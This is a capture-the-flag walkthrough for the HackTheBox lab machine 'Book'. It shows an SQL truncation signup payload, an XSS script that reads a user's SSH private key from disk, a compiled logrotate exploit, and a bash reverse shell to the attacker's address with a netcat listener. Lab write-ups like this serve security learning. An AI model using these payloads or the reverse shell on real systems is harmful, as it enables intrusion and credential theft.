HTB Walkthrough Book 10.10.10.176

Summary
Foothold
After the Nmap scan we see there are only 2 ports open. after poking around we discover the sign up page is vulnerable to an SQL truncation Attack
User
Once we are logged into the admin and normal site we discover an XSS vulnerability, cause this vulnerability we were able to get the id_rsa key and login to the box
Root
After some enumeration we discover there is a vulnerability in the log rotate application after exploiting this we were able to take over the machine completely.
Enumeration
Nmap
nmap -sC -sV -p- 10.10.10.176

Web
10.10.10.176

http://10.10.10.176/admin

Turns out it’s vulnerable to sql truncation:

intercepting this request with burp so we can edit it and use the sql truncation attack:

admin%20%20%20%20%20x&email=admin%40book.htb%20%20%20%20%20%20x&password=12345678

admin@book.htb:12345678
XSS attack
10.10.10.176/admin

10.10.10.176


<script> x=new XMLHttpRequest; x.onload=function(){ document.write(this.responseText.fontsize(1)) }; x.open("GET","file:///home/reader/.ssh/id_rsa"); x.send(); </script>
10.10.10.176/admin

open the collections
and we get our rsa key:

Note: of course we did some more enum with our LFI, thats why we know we need reader as user.
chmod 600 id_rsa


Privilege Escalation
After some enumeration it turns out we found the folowing vulnerability
https://www.exploit-db.com/exploits/47466
compile exploit:
gcc -o exploit exploit.c
create a bash script with reversed shell:
!/bin/bash
bash -i >& /dev/tcp/10.10.14.25/443 0>&1
nc -lvp 443
./exploit -p shell.sh /home/reader/backups/access.log
to speed things a bit up I login with another shell and execute the folowing command to trigger the log rotation
echo rotateme >> /home/reader/backups/access.log

shell was unstable so since there is a id_rsa key I decided to grab that one when the root shell popped up

chmod + 600 root_id
ssh -i root_id root@10.10.10.176

Made by s3cwalk
Disclaimer: Please use our posts for educational purposes only. Wrong usage could make you end up in jail.